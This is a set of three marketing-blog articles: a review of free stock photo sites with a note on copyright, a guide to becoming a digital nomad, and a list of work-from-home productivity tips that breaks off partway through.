The 9 best free stock photo sites in 2022

How to find free stock images for business and commercial use

Stock photo sites are a dime a dozen, so it can be tough to know where to find free, high-quality images that aren’t also on every other website.

And as a freelancer and a business owner, I’ve done my fair share of scouring the web for that perfect stock photo. So I spent several weeks reviewing dozens of stock photo websites—and I narrowed it down to the nine best for your next project. 

The 9 best free stock photo sites

  • Unsplash for the widest variety of free stock images (and integrations)
  • Pixabay for a variety of media types
  • Gratisography for quirky images you won’t see anywhere else
  • Canva for adding simple enhancements and overlays
  • Burst for eCommerce companies
  • New Old Stock for vintage photos
  • Reshot for UX/UI designers
  • 123RF for photo sizes optimized for social media
  • Flickr for interacting with the photography community

How to find the best websites with 100% free stock photos

How we evaluate and test apps

All of our best apps roundups are written by humans who’ve spent much of their careers using, testing, and writing about software. We spend dozens of hours researching and testing apps, using each app as it’s intended to be used and evaluating it against the criteria we set for the category. We’re never paid for placement in our articles from any app or for links to any site—we value the trust readers put in us to offer authentic evaluations of the categories and apps we review. For more details on our process, read the full rundown of how we select apps to feature on the Zapier blog.

Finding images that are free for commercial use isn’t as hard as it might sound, thanks to a number of sites that aggregate photos, illustrations, vectors, and more. These sites usually let you search and filter by keyword or category, making it easy to find what you’re looking for. But that doesn’t mean every stock photo site is worth perusing.

The best free stock image sites all meet the following criteria:

  • They must contain images that can be used without payment for both commercial and personal purposes.
  • I focused on sites that have at least 500 photos, but I favored ones that offer thousands of images.
  • A lot of free stock photo sites essentially offer the same pictures. I looked for sites that offered unique images, so your content can stand out.
  • If you plan to use stock photos for your website or branded content, you’ll need high-quality resolutions. Every site on this list offers at least one high-quality download size for its photos.
  • And of course, the website itself should be fast, easy to navigate, and from this century.

When reviewing these sites, I visited each one and signed up for an account if necessary. I explored the site’s menus and conducted a number of searches to see what types of photos would come up. I reviewed the quality of the photos and took note of things like how advanced the search filters were, whether there were high-resolution download sizes available, and if there was anything uniquely useful about the stock photo site in question.


Best free stock photos site for a variety of photos and integrations  

Unsplash (Web, iOS, Android)

With more than three million photos and multiple plugins, Unsplash is one of the most easily accessible and largest collections of stock photos available. 

It comes with native apps like an iOS app, an Android photo picker, Apple TV and desktop wallpaper apps, and even a Chrome extension that randomly selects a background image when you open your browser. Unsplash’s API is also already natively integrated into popular tools like Figma, Notion, Trello, and Squarespace, letting you search and use high-quality stock photos without leaving your favorite platform. 

The site is also easy to use: type a keyword into the search bar at the top of the page, and browse the results to find the best images for your purposes. And if you don’t know what you’re looking for, there are category tabs along the top of the homepage for inspiration.

Another feature that sets Unsplash apart from other free photo sites is its Collections section. Users of the site are able to create Collections—like “Christmas Traditions,” “Autumn,” and “Milkyway“—by curating photos they come across. If you want several similar photos of a specific theme, Unsplash may be your best option.

Best free stock photos site for a variety of media types

Pixabay (Web, iOS, Android) 

Pixabay hosts more than 2.6 million photos, illustrations, vector graphics, and videos—all of which are free to use. Click Images next to the search bar to look for images by type, or you can search more granularly by becoming familiar with Pixabay’s advanced search options. Pixabay lets you search by photographer, orientation (i.e., landscape or portrait), size, and even color. The site also features an Editor’s Choice curation section, which highlights the best images chosen by the Pixabay team. Click the Explore dropdown menu in the upper-right corner of the site to see their selections.

If you need a professional-looking illustration, i.e., a hand-drawn image or a computer-generated graphic, you should begin your search here. Royalty-free illustrations can be tricky to find on many free image sites, but Pixabay has loads of them. Just click Images, select Illustrations, enter your search terms, and that's that. You can also use Pixabay to search for vector graphics, videos, music, and even sound effects.

Best free stock photos site for quirky images you won’t see anywhere else

Gratisography (Web, Android)

Gratisography doesn’t have thousands of pictures for you to browse through. What it does have is some of the quirkiest images you will find on the web—images you won’t be able to find anywhere else, like a young kid spray painting and an alarm clock that looks like it’s on the moon.

The site is pretty barebones—and its color scheme is distracting at best, with bright neon colors and cartoonish UI elements. Photos are organized into only nine different categories: Animals, Business, Fashion, Food, Nature, Objects, People, Urban, and Whimsical. And while the photo resolutions are high-quality, they only come in one size (and you have to download each photo to find out). 

But if you’re looking for an odd image that will bring your content to life, Gratisography is definitely the place to start.

Best free stock photos site for adding simple enhancements and overlays

Canva (Web, macOS, Windows, iOS, Android) 

Canva is a web-based graphic design tool that makes modifying images easy. If you’re looking for stock photos for a graphic design project—like designing a social media banner or a flyer—Canva is a one-stop shop for your needs. Even with a free account, the platform offers a library of over 1.6 million free images you can use for any purpose.

If you’re planning on enhancing the images you find with simple text overlays or tweaking the transparency or vibrancy of photos on a regular basis, Canva will help you streamline the process. Find photos, and then use Canva’s built-in design tool to enhance them on the spot.

One helpful feature is that Canva automatically generates a color palette for any photo you choose. If you’re building a vision board or a design presentation, you can easily use the hex color codes to keep your project’s color scheme consistent.

Canva does come with a few downsides, though. As I was testing, I noticed that you can’t directly download a stock photo as you would from another stock photo site. Instead, you’ll have to click Use in a design. Canva takes you to the design dashboard with the stock photo on your digital canvas. While this is helpful if you intend to add text or graphics to the image, it’s an unnecessary complication if you plan to download a stock photo as-is.  

Also, many of the best stock photo sites let you choose the size of your photo before downloading it. Canva only provides one size—though the photos are all in high resolution.

If you're looking for more stock photo sites for graphic design, PikWizard and Kaboompics are both great Canva alternatives. PikWizard is linked to DesignWizard, a design tool similar to Canva. And Kaboompics focuses on color palettes; you can even download your chosen photo along with the color scheme it uses, which is useful for putting together vision boards and presentations. Kaboompics also lets you choose a custom pixel width when downloading an image, which is a helpful feature.

Best free stock photos site for eCommerce businesses

Burst (Web, iOS, Android) 

Burst is a free stock photo site powered by leading eCommerce platform Shopify. The platform offers thousands of free images you can use to strengthen your content, including a large selection of business-oriented photos (e.g., retail, eCommerce, money, and products). The site serves up 28 different categories, several of which are broken down into subcategories to make it even easier to find the images you need.

Browsing, searching, and downloading are standard fare, but as an added bonus, Burst and Shopify offer advice on things like how to turn your online business ideas into reality.

Best free stock photos site for vintage photos

New Old Stock (Web) 

New Old Stock publishes vintage photos from the public archives. If you think old photos—like a group of men sitting outside a storefront in the late 1800s or a British dispatch rider in France—would match your brand, spend a few minutes scrolling through New Old Stock to see if anything catches your eye.

Unfortunately, the site doesn’t have as much variety as other stock photo sites—and not all of the photos are free for commercial use. The site creator advises commercial users to check with the originating institution’s rights statement through the provided link to the original Flickr posting of each photo.

The site’s search functionality also leaves much to be desired. And unlike most free image sites, New Old Stock doesn’t offer any way to filter photos. If you’re feeling lucky, though, click the magnifying glass in the upper-left corner of the site, type in a search phrase, and you may strike (vintage) gold.

Best free stock photos site for UX/UI designers

Reshot (Web)

Reshot is a relatively new resource for designers, whether they need stock photos, vector illustrations, or icons. The site’s collection is provided by the design team over at Envato Elements, a paid creative subscription service for templates, photos, music, and more. But Reshot provides free visual resources for designers on a budget.

Unlike many other stock photo sites, Reshot has a wide variety of vector illustrations and icons as well. The site boasts millions of images that are free for personal and commercial use. The website is minimalist in design, with a left-hand menu where you can choose to browse collections of icons, illustrations, or photos. Or if you know what you’re looking for, type your search terms into the search bar and narrow the results by media type and orientation. 

If you find an illustration you like, you can download it as a vector or a PNG, while icons are available as copyable SVG code or as an SVG file. And since you'll likely want to make additions or changes to these images, Reshot makes it easy to send files straight into Figma.

One downside I noticed as I was testing is that while illustrations and icons have multiple download types, it appears that photos can only be downloaded as JPEGs—and only in one size. Those sizes are in high-quality resolution, but you can’t choose from a variety of sizes. But in general, if you’re looking for ideas or raw images for your wireframes or prototypes, Reshot is a great option. 

Best free stock photos site for optimizing images for social media

123RF (Web, iOS, Android)

If you’re looking for free stock photos for Instagram or other social media sites, 123RF makes your search easy. The stock photo site not only provides a variety of free photos and vector illustrations, but it also lets you choose from a selection of download sizes, including Facebook cover, email header, Pinterest post, and even brochure cover. 

These pre-selected sizes can save you hours of cumulative time spent cropping and resizing images for social media. You can even apply a filter, add text, and remove the image’s background directly from the site before downloading it.

As I was testing, I did notice that you can’t reposition an image after choosing a social media-optimized size. So if you choose an image whose focal point isn’t the center, you may run into issues if you pair it with a small or narrow aspect ratio. 

Overall, the site is clean and easy to navigate. And if you’re willing to pay a few dollars per image, 123RF provides a wider variety of images as well as a variety of stock footage and audio for use in your next project.

Best free stock photos site for interacting with the photography community 

Flickr (Web, iOS, Android)

Flickr is a photo sharing social network. The site—which boasts more than five billion images—brings together professional and amateur photographers from around the world.

The thing I appreciate about Flickr is that it places artists front and center. When you navigate to Flickr’s homepage, you’ll immediately see a gallery of suggested people to follow. Click into any one of their profiles to see a “Photostream,” or a feed of their latest and most popular images. Flickr is a great way to discover talented photographers, learn more about the field, and refine your own artistic eye.

The photos on Flickr are known for containing rich metadata, including geolocation information, EXIF data, tags, and more. So if you want to find photos taken in France, select the World Map under the Explore dropdown, and click on one of the pink dots that pop up in that country. If you want to find images of golden retrievers, simply type the term into the search bar in the upper-right corner of the Flickr homepage, and thousands of results will come back. Plus, Flickr lets you search by trending photos and most recently added photos. You can even explore galleries and search specific photographers’ collections by clicking on their usernames.

And if you’re a budding photographer yourself, you can even click Camera Finder under the Explore dropdown to see the most popular cameras currently being used in the Flickr community.

Keep in mind that you can’t use every photo you find on Flickr for free—especially for commercial use. But it’s easy to figure out which ones are usable. Run a search for an image, and then click the Any license dropdown menu and select Commercial use allowed.

If you get sick of seeing ads as you browse Flickr, you can upgrade to an ad-free experience for $5.54/month. The premium subscription also comes with unlimited storage (free users get one terabyte of storage). And if you want to do even more with your stock photos, connect Flickr to Zapier to do things like share new Flickr photos on social media or back up new Flickr photos to Google Drive.

If you’re looking for more sites that prioritize the photography community, Pexels is a great Flickr alternative. Pexels offers hundreds of thousands of photos that are free for both commercial and personal use. The site has a leaderboard and a number of photography contests for contributors, which makes it a great site for finding photographers who are engaged with the platform and constantly uploading fresh content. 

Other stock photo sites to consider

If you're looking for something a little more unique (and you have the budget for it), you could try a paid option like Shutterstock, iStock by Getty, or Adobe Stock. These sites are all well-established resources for paid, but relatively affordable, stock photos. You can subscribe to any of these sites for $29 per month for up to ten monthly image downloads.

There are also many niche stock photography sites out there (like Foodiesfeed, which specializes in food photography). So if you’re looking for a specific type of image, it’s worth seeing if there’s a niche site available. These sites might give you a wider range of options in the specific category you’re looking for.

If you’re publishing content on a regular basis, you’ll likely get the best results by using a combination of our recommended sites. Just be sure that you keep your branding consistent: using too many eclectic images can muddy your brand and make it hard to stand out from the crowd.

A note on copyrights

Why can't you just scour the web for an image you like and publish it? Because creators own the rights to their images, and if you publish one without their permission, you may be liable for copyright infringement. In the worst case, a US court can award statutory damages of up to $150,000 per work for willful infringement, and criminal penalties exist for the most serious cases. More often you'll receive a cease-and-desist letter or a takedown demand first, but even then you'll waste time and effort removing the images, in addition to the time and effort you spent finding them in the first place.

But some creators are happy to share their images with others. Creative Commons offers a number of different licenses that creators can use to let other people use their work freely. Of course, it's not all or nothing: some licenses allow for personal use only, while others allow for commercial use. Some licenses require you to attribute images to their creators, while others don't. Some allow you to adapt or modify an image, while others require you to use it in its original form. When using an image licensed through Creative Commons, be sure to read the fine print and abide by the terms.

Source:
https://zapier.com/blog/best-free-stock-photos/

What Is a Digital Nomad and How Do You Become One?

In the Cascade Mountains of Southern Oregon, there sits a volcano with no peak. But what takes the place of a billowing summit isn’t a barren crater — it’s an electric blue lake, surrounded by pine trees and the jagged remains of the volcano’s collapsed mouth, which crumbled during an eruption almost 8,000 years ago.

This place is called Crater Lake. It's considered one of the most beautiful national parks in the United States. It's also where Justin Champion, a Content Professor at HubSpot Academy, spent his work day last Thursday.

A striking landscape, like Crater Lake, is a normal office view for Justin and his wife, Ariele. After working in the National Park, they headed north to Portland and spent a day in Mt. Hood. Then, they drove through Redwood National Park. And next week, they plan to work in Yosemite National Park.

Justin and his wife have been living, working, and traveling across America in a Ford F-250 with an Airstream trailer hitched to its back for the past two years. And their alternative lifestyle has helped them prioritize life experiences and close connections over material possessions. They’re modern day nomads. Or what most people call digital nomads.

What is a Digital Nomad?

Digital nomads are remote workers who usually travel to different locations. They often work in coffee shops, co-working spaces, or public libraries, relying on devices with wireless internet capabilities like smartphones and mobile hotspots to do their work wherever they want.

With 34% of remote employees working 4-5 days a week out of the office, the digital nomad lifestyle could be an exciting possibility if you’ve caught the travel bug and want to break free from the shackles of 9-5 life. Below, we’ll cover the benefits, job opportunities, and realities of this alternative lifestyle.

Let’s find out if it’s the right fit for you.

Living the Dream? 5 Benefits of Being a Digital Nomad

1. You’ll be more productive.

There’s no time to waste when you travel to gorgeous places almost every day. Exploring your new surroundings will motivate you to get your work done as soon as possible. Adventure can be one of the best types of motivation.

2. You’ll have more breakthrough ideas.

Creativity happens when you mash seemingly unrelated concepts together to form a new idea. Neuroscientists call this synaptic play, and the more incongruent the concepts are, the more synapses occur in your brain. Working in a different place every day gives you a lot of diverse experiences that you can pull from to make these creative connections. And when your brain is chock full of these diverse inputs, your ideas are much more inventive.

3. You’ll become more adaptable.

Constantly traveling to new places pushes you out of your comfort zone. And to adapt to new environments every day, you need to be willing to engage with different people and cultures. This makes you more open to new experiences in the future.

Traveling also improves your brain’s reaction to change. When you travel, the stress of navigating a foreign place sprouts dendrites in your brain. These dangling extensions increase your brain’s capacity and attentiveness during new and challenging situations in the future.

In a nutshell, traveling strengthens your desire and ability to learn new skills.

4. You’ll have more time to do the things you love.

Even though work can be great, we still work to live, not the other way around. Finishing work faster gives you more time in your schedule to explore your surroundings, do the things you’re passionate about, and spend more time with loved ones.

5. You’ll make lifelong friendships.

Adventure and memorable experiences forge close connections between people. When you embark on your journey, you’ll meet other digital nomads and become friends with them. And if you travel with a friend or significant other, your relationship will be closer than ever before.

Common Jobs for Digital Nomads

Today, most companies embrace remote work. 43% of American employees spent time working remotely last year, and this number will only increase. But being a digital nomad and working a few days at home are two different animals. If you want to keep your day job while traveling, you need to prove to your manager that you can handle full-time remote work before you can work on the road. Justin Champion decided to work remotely for six months before he even asked to travel.

If you're looking for a job, sift through sites that only list remote jobs, like We Work Remotely or Remote.co, and ask prospective employers if the role lends itself to your nomadic lifestyle.

Freelancing is also a common role for digital nomads. Before you embark on your journey, though, you must be realistic with yourself. How will you be able to make a living? Answer the following questions to help you figure this out:

  • What am I good at?
  • What do I like to do?
  • Is there a need for my skill?
  • Can I do this job online?

Once you know how you’ll be able to make money, you can enter the gig economy by marketing and selling your services on your own, or finding work on a freelance service marketplace like Upwork or Fiverr.

Whether you choose to work for a company or for yourself, becoming a digital nomad doesn't mean pigeonholing yourself in a specific role. Your job just has to be fully digital. Listed below are some common roles that lend themselves well to a fully remote lifestyle:

  • Accounting
  • Customer Service
  • Design
  • Editing
  • Healthcare
  • IT
  • Marketing
  • Project Management
  • Quality Assurance (QA)
  • Recruiting & HR
  • Sales
  • Software Development
  • Teacher/Tutor
  • Transcription
  • Virtual Assistant
  • Writing

As you can see, there are a lot of different industries and roles for digital nomads. Remote work is becoming commonplace, which is exciting and beneficial for the workforce. But that doesn't mean anyone and everyone should be a digital nomad. It's still a tough challenge. You need to be organized and disciplined, or you won't be able to enjoy your travels, which is the point of the lifestyle, right? So how do you set yourself up for success?

How Do You Become a Digital Nomad? 5 Things to Consider Before You Get Started

1. Get rid of unnecessary expenses.

Paying for things that don’t greatly impact your life is never ideal. That’s why you need to get rid of all the expenses that you won’t need living as a digital nomad. Things like gym memberships, subscriptions, and debt are all expenses that’ll bog you down on the road. And if you’re a freelancer, they’ll be even more of a burden because you might experience some periods of inconsistent income. Getting rid of these expenses and paying off debt will allow you to fully focus on your work and travels.

2. Make sure you have income you can rely on for months in advance.

Whatever lifestyle you pursue, it's always smart to have a safety net. You never know when an emergency will arise. This rings especially true when you're a digital nomad because you're mostly on your own. You can't find solace in a warm, comfortable home or family, and if you're a freelancer, you don't have the luxury of a consistent paycheck. To widen your safety net, you should sell any unnecessary belongings, move the essentials into a storage unit, sell or rent your house, and save as much money as possible.

3. Get travel health insurance.

Traveling can give you some of the best experiences of your life, but it's not always a blissful, perpetual highlight reel. It's still real life. You'll get sick, have emergencies and accidents, and need regular checkups. You also need immunizations to enter certain parts of the world. Your health should be your number one priority during your travels, so make sure you buy a solid health insurance plan that's valid in all the places you visit.

4. Set yourself up for financial success.

Ample funds are the key to successful travel. American credit cards will usually charge you a foreign transaction fee if you use them abroad, so ask your bank for a card that doesn't. You should also sign up for a credit monitoring service that alerts you when a new account or hard credit inquiry appears in your name, so you'll find out quickly if someone tries to steal your identity.

5. If you travel internationally, unlock your phone.

Most countries have different cell phone carriers, so if you want to bounce from country to country, you need to call your current carrier and ask them to unlock your phone. Once it's unlocked, you can use it in any country by putting in a SIM card from a local carrier wherever you go.

Once you square these things away, it’s time to start your new life on the road. But actually living life as a digital nomad is an entirely different ballgame than preparing to be one.

7 Tips for Living as a Digital Nomad

1. Make a budget.

As a digital nomad, your budget should be your bible. And if you follow it, you can live quite comfortably. To create a successful budget, calculate your living expenditures, the cost of traveling to each destination, staying there, the activities you’ll do there, the costs of working, and how it all affects your savings if you can’t earn a salary for a while.

2. Plan for the worst-case scenario.

When you live abroad, it's crucial to have multiple backup plans in case of any emergencies. Nothing really ever works out the way it's supposed to. Things happen. What if your truck breaks down? Or what if you get stuck in a foreign country with no backup plan? What's your plan B and C? You need to set these processes in place to handle the inevitable bumps in the road.

3. Join a digital nomad community.

Digital Nomad communities like Couchsurfing and Nomadlist will help you learn the nuances of the digital nomad lifestyle, and reduce its steep learning curve. Fellow nomads will be happy to answer any pressing questions about your new lifestyle and any areas you plan to visit. They’ll also teach you how to work effectively on the road. And arguably the most beneficial perk of these communities is that you can connect with other traveling professionals, which can lead to new business opportunities, partnerships, and friendships.

4. Make sure you have cell reception or Wi-Fi.

If your employer lets you work remotely, show them and your team some respect by being available online as much as possible. Not having Wi-Fi or cell phone reception should never be an excuse for missing a meeting or failing to get an assignment done. The same goes for client work if you're a freelancer.

To make sure you'll always have an internet connection, consider investing in a cell phone signal booster and a mobile hotspot (MiFi) device. Signal boosters can pick up the faintest shred of cell reception and relay it inside your vehicle. A dedicated mobile hotspot gives you a connection of your own, so you don't have to rely on spotty public Wi-Fi that you share with everyone else in the room.

5. Make sure you can communicate with locals.

Knowing the language of the country you’re going to or knowing that they speak your language is crucial for successful travel. Assuming that there has to be someone who will understand English is a dangerous move. But if you must go to a place where you don’t know the native language or they don’t speak yours, use Google Translate or another translation app to navigate your new environment.

6. Research your destinations.

If you're not living in an RV, find affordable housing on Airbnb or Couchsurfing before you arrive at your destination. And make sure your lodging is near a hospital, emergency room, or clinic in case of an emergency. You should also research the area to find a safe neighborhood to stay in.

7. Draw cash from ATMs.

Airports are notorious for charging ridiculously high currency exchange fees. If you need cash, draw it from an ATM. Your bank will charge you a fee, but it’ll be much lower than the one at the currency exchange desk.

Before you set off …

If an adventurous lifestyle sounds appealing to you, then being a digital nomad can be one of the most rewarding yet challenging ways to live. But if you arm yourself with organization, discipline, and a thirst for learning, you could enjoy an exciting and fulfilling life on the road. Just ask Justin and Ariele Champion. They’re living the alternative American Dream. And they’ve never looked back.

Source:
https://blog.hubspot.com/marketing/digital-nomad

How to Work From Home: 24 Tips From People Who Do It Successfully

Working from home is awesome, right up until the cat throws up on your computer. And your neighbor, who you can only assume is building a time machine, starts firing up all sorts of power tools and noisy machinery across the street.

COVID-19 has caused remote work to become a necessity instead of a luxury for many professionals. But which environment allows us to be more productive: the home office or the office office?

In the office office, your colleagues often pose the greatest threat to keeping you from getting some real, heads-down work done. They drop by your desk, engage you in conversation, and invite you to lunch — or so I hear. The social benefits are nice to have, but they can become a challenge if you’re easily distracted.

However, at the home office, while family members can be a distraction, I find that it’s easy for you to become your own worst enemy. Because without coworkers around, you’re free to drop those pesky inhibitions. At the home office, no one’s watching. You don’t necessarily feel that same peer pressure or communal obligation to get stuff done. (Also, you don’t have to wear pants.)


Below, I’ve compiled many great work-at-home tips and tricks from some of my awesome coworkers.


How to Work From Home

  1. Communicate expectations with anyone who will be home with you.
  2. Take clear breaks.
  3. Interact with other humans.
  4. Prepare meals the night before.
  5. Pick a definitive finish time.
  6. Eat and sleep.
  7. Talk to your employer.
  8. Join a remote-friendly company.
  9. Start a career as a freelancer.
  10. Start a home business.

1. Communicate expectations with anyone who will be home with you.

Of course, you might be working from home but still have “company.” Make sure any roommates, family members, and dogs (well, maybe not dogs) respect your space during work hours. Just because you’re working from home doesn’t mean you’re home.

If you share space with another work-from-home adult, you may have to lay ground rules about meeting times, shared desks and chairs, and quiet times.

CEO Sam Mallikarjunan tells how he manages to get work done even when people are around.

“If anyone else is going to be at home when you’re working, they just have to be clear that when you’re in your ‘office’ (in my case, my signal to the family is having headphones on), you’re working — even if it looks like and feels like you’re hanging out at home.”

He continues, “It’s easy to get distracted by the many things that have to be done around the house during the day.”

2. Take clear breaks.

It can be so easy to get distracted as a telecommuter that you avoid breaks altogether. Don’t let the guilt of working in the building you sleep in prevent you from taking five minutes to relax.

However, rather than just opening YouTube and watching some comfort clips, use your breaks to get away from your desk. Go for a walk, enjoy fresh air, or spend time with others who might also be in the house.

Take Ginny Mineo‘s advice. “Breaks, like making and eating lunch, can recharge you to do better work. Don’t assume you need to be working 100% of the time while you’re home to be more productive.”

3. Interact with other humans.

When your office starts working from home, you’ll likely miss the casual social interactions with colleagues you’re used to throughout the day. When working from home, you don’t have the small talk and other activities that make each day at the office unique.

So what can you do? Communicate.

Fight boredom and loneliness through frequent communication with other employees. Reach out to them through video chat via apps like Zoom and Slack, a hosted phone system, or however else your company communicates.

Remember: You’re working from home, not the moon. Interacting with other people during the day is allowed, even if they’re not your colleagues. It’s a good idea to see another face during the day when most of your workday is solitary. So, use your breaks to interact with others.

“Go outside and find a human to interact with — ordering your coffee, running an errand, whatever. It keeps you sane.”

– Corey Wainwright

4. Prepare meals the night before.

When you’re in your own home, it can be tempting to spend time preparing a nice breakfast and lunch for yourself, chopping and cooking included. Don’t use precious minutes making your food the day of work — cook it the night before.

Preparing food ahead of time ensures you can use your meal times to eat and that you aren’t performing non-work tasks that spend energy better used at your desk.

Digital marketing strategist, Lindsay Kolowich, adds, “Cooking at home is time you wouldn’t have spent meal prepping if you’d been in the office that day, and I find the minutes can add up in the end. To mitigate that, I try to cook and prep my meals the night before, just like I would for a day at the office.”

5. Pick a definitive finishing time.

You might be under the impression that working from home establishes more work-life balance, but be careful with that assumption.

Working from home can also feel like being at a casino — you can get so caught up in your activity, in a relaxing environment, that you lose complete track of time.

“If you work from home full-time (or regularly), it’s really easy to let your work life bleed into your personal life,” says Tyler Littwin.

He continues, “Maintaining a boundary is important for both halves of the equation.”

In lieu of coworkers, whose packing up and leaving the office reminds you to do the same, set an alarm at the end of the day to indicate your normal workday is coming to an end. You don’t have to stop at exactly that time, but knowing the workday is technically over can help you start the process of saving your work and calling it quits for the evening.

6. Eat and sleep.

What is the biggest perk to working from home? One of the biggest benefits for some people (me), is complete access to the kitchen.

As soon as I take a break, I automatically drift towards the kitchen for some snacks.

An unhealthy diet can affect productivity and drain energy. When I switched to a healthier diet, it made me function better and get the most from my routine.

So eat well when working from home.

It’s also vital that you keep to a proper sleep schedule. Save binge-watching your favorite shows for the weekend. With the right food to keep energy levels high and sound sleep to refresh your body and mind, you can make a success of working from home.

7. Talk to your employer.

If you like your current job and don’t want to change it, the obvious step is to find a way to pivot the position.

One of the tips for doing this is folding the possibility of going remote into your next promotion cycle. Talk to your boss often about your intention to pivot.

And, if you’re not sure your employer will agree to working completely remotely, talk about the option of working remotely one or two days a week. When you use the work from home tips we’ve provided above, and your boss sees how productive you are, they could allow you more days to work from home.

8. Join a remote-friendly company.

If your work can be done remotely, but your current boss or organization doesn’t allow you to work from home, you might need to get a new job.

When looking for a work-from-home job, you can use the same methods you used in finding your regular office job. This includes channels like job sites, local job ads, and social media platforms.

Job sites that list work from home ads include:

Some remote-friendly firms include:

Check out these firms to see whether you meet the requirements to start working remotely for them.

9. Start a career as a freelancer.

If your current job isn’t remote work-friendly, you can go remote by starting your own business as a freelancer or a consultant.

Depending on the nature of your current job, you may start your own freelance business while still being employed.

The benefit of starting your freelance business while still employed is that it reduces the financial strain experienced by any new business.

10. Start a home business.

Starting a home business is one way to enjoy remote work.

Unlike other fields, certifications and education are not usually prerequisites. Instead, researching, having a smart business plan, and choosing the right business is more essential to the success of your business.

You can find more work-from-home tips in the books listed in this best remote work books article.

Working From Home Tips

  1. Get started early.
  2. Pretend like you are going into the office.
  3. Structure your day like you would in the office.
  4. Choose a dedicated workspace
  5. Don’t stay at home.
  6. Make it harder to use social media.
  7. Commit to doing more.
  8. Work when you’re at your most productive.
  9. Save calls for the afternoon.
  10. Focus on one distraction.
  11. Plan out what you’ll be working on ahead of time.
  12. Use technology to stay connected.
  13. Match your music to the task at hand.
  14. Use laundry as a work timer.

1. Get started early.

When working in an office, your morning commute can help you wake up and feel ready to work by the time you get to your desk. At home, however, the transition from your pillow to your computer can be much more jarring.

Believe it or not, one way to work from home productively is to dive into your to-do list as soon as you wake up. Simply getting a project started first thing in the morning can be the key to making progress on it gradually throughout the day. Otherwise, you’ll prolong breakfast and let the morning sluggishness wear away your motivation.

Lindsay Kolowich says, “When I work from home, I wake up, put on a pot of coffee, and start working immediately — much earlier than normal working hours. I only start making breakfast once I’ve hit a wall or need a break. I’m a morning person and find I can get a ton done in the early morning hours, so this works really well for me.”

2. Pretend like you are going into the office.

The mental association you make between work and an office can make you more productive, and there’s no reason that feeling should be lost when working remotely.

I know that you love working in your pajamas (I do, too), but the mere act of changing clothes to something more serious will give you a signal to get work done throughout the day.

When you dress up, you give your brain a reason for dressing up, and it can keep you pumped throughout your work hours.

So when working from home, do all the things you’d do to prepare for an office role: Set your alarm, make (or get) coffee, and wear nice clothes.

Internet browsers like Google Chrome even allow you to set up multiple accounts with different toolbars on the top — for example, a toolbar for home and a separate toolbar for work.

Take to heart the words of HubSpot graphic designer, Anna Faber-Hammond, who says, “Get fully ready for the day and pretend you’re actually going to work. Otherwise, you might find yourself back in bed.”

3. Structure your day like you would in the office.

When working from home, you’re your own personal manager and can choose your working hours.

However, without things like an in-person meeting schedule to break up your day, you can easily lose focus or burn out.

To stay on schedule, segment what you’ll do and when for the day. If you have an online calendar, create personal events and reminders that tell you when to shift gears and start on new tasks. Google Calendar makes this easy.

Structuring your day as you would in the office also saves you from work creep. With this structure in place, working from home will not cause your work to invade your personal life.

“Are mornings for writing while you’re in the office? Use the same schedule at home. This structure will help keep you focused and productive.” – Ginny Mineo

4. Choose a dedicated workspace.

Just because you’re not working at an office doesn’t mean you can’t, well, have an office. Rather than cooping yourself up in your room or on the couch in the living room — spaces associated with leisure time — dedicate a specific room or surface in your home to working remotely.

No matter the space or location, have an area of the home to work and stay committed to throughout the day. And, after choosing your dedicated workspace, make the most of it by making it quiet.

CEO, Sam Mallikarjunan says, “Have a place you go specifically to work. It could be a certain table, chair, local coffee shop — some place that’s consistently your ‘workspace.’ It helps you get into the right frame of mind.”

5. Don’t stay at home.

Is your home office just not getting it done for you? Take your work-from-home life a step further and get out of the house. Coffee shops, libraries, public lounges, and similar Wi-Fi-enabled spaces can help you simulate the energy of an office so you can stay productive even when you don’t sit in an official workplace.

Content marketer, Corey Wainwright, comments, “I get out of my home to work and go to an establishment with actual tables, chairs, and people. It helps simulate the work environment and removes the distractions I typically have at home, like the urge to finally clean my room, do laundry, or watch TV.”

6. Make it harder to use social media.

Social media is designed to make it easy for us to open and browse quickly. As remote workers, though, this convenience can be to the detriment of our productivity.

To counteract your social networks’ ease of use during work hours, remove them from your browser shortcuts and log out of every account on your phone or computer.

You might even consider working primarily in a private (or, if you’re using Chrome, an “Incognito”) browser window. This ensures you stay signed out of all your accounts, and each web search doesn’t autocomplete the word you’re typing. It’s a guarantee that you won’t be tempted into taking too many social breaks during the day.

Also, many have found it helpful to shut off social media notifications during the hours they work from home.

Alec Biedrzycki, product marketer at AirTable, says, “I remove all social networks from my toolbar bookmarks… you can get sucked in without knowing it, so eliminating the gateway to those networks keeps me on track.”

7. Commit to doing more.

Projects always take longer than you initially think they will. For that reason, you’ll frequently get less done than you set out to do.

So, just as you’re encouraged to overestimate how many work hours you’ll spend doing one thing, you should also overestimate how many things you’ll do during the day.

Even if you come up short of your goal, you’ll still come out of that day with a solid list of tasks filed under ‘complete.’

“On days I’m working from home, I tend to slightly overcommit on what I’ll deliver that day. So even if I get the urge to go do something else, I know I’ve already committed a certain amount of work to my team.” – Corey Wainwright

8. Work when you’re at your most productive.

Nobody sprints through their work from morning to evening — your motivation will naturally ebb and flow throughout the day. However, when you’re working from home, it’s all the more important to know when those ebbs and flows will take place and plan your schedule around it.

To capitalize on your most productive periods, save your more challenging tasks for when you know you’ll be in the right headspace for them. Use slower points of the day to knock out the easier logistical tasks on your plate.

Verily Magazine calls these tasks “small acts of success,” and they can help build your momentum for the heavier projects that are waiting for you later on.

Product designer, Brittany Leaning, says about her routine, “For me, the most productive times of the day are usually early in the morning or late at night. I recognize this and try to plan my day accordingly. Also, music that pumps me up doesn’t hurt.”

The responsibility is on you to know when you are most productive and build your work schedule around the periods of maximum productivity.

9. Save calls for the afternoon.

Sometimes, I’m so tired in the morning that I don’t even want to hear my voice — let alone talk to others with it.

You shouldn’t have to give yourself too much time to become productive in the morning, but you can give yourself some extra time before working directly with others.

If you’re struggling to develop a reasonable work schedule for yourself as a telecommuter, start with the solitary tasks in the morning.

Save your phone calls, meetings, Google Hangouts meetings, video calls, and other collaborative work for when you’ve officially “woken up.”

Senior Marketing Director, James Gilbert, advises that you “Take advantage of morning hours to crank through meaty projects without distractions, and save any calls or virtual meetings for the afternoon.”

10. Focus on one distraction.

There’s an expression out there that says, “if you want something done, ask a busy person.”

The bizarre but true rule of productivity is that the busier you are, the more you’ll do.

It’s like Newton’s law of inertia: If you’re in motion, you’ll stay in motion. If you’re at rest, you’ll stay at rest. And busy people are in fast-enough motion that they have the momentum to complete anything that comes across their desk.

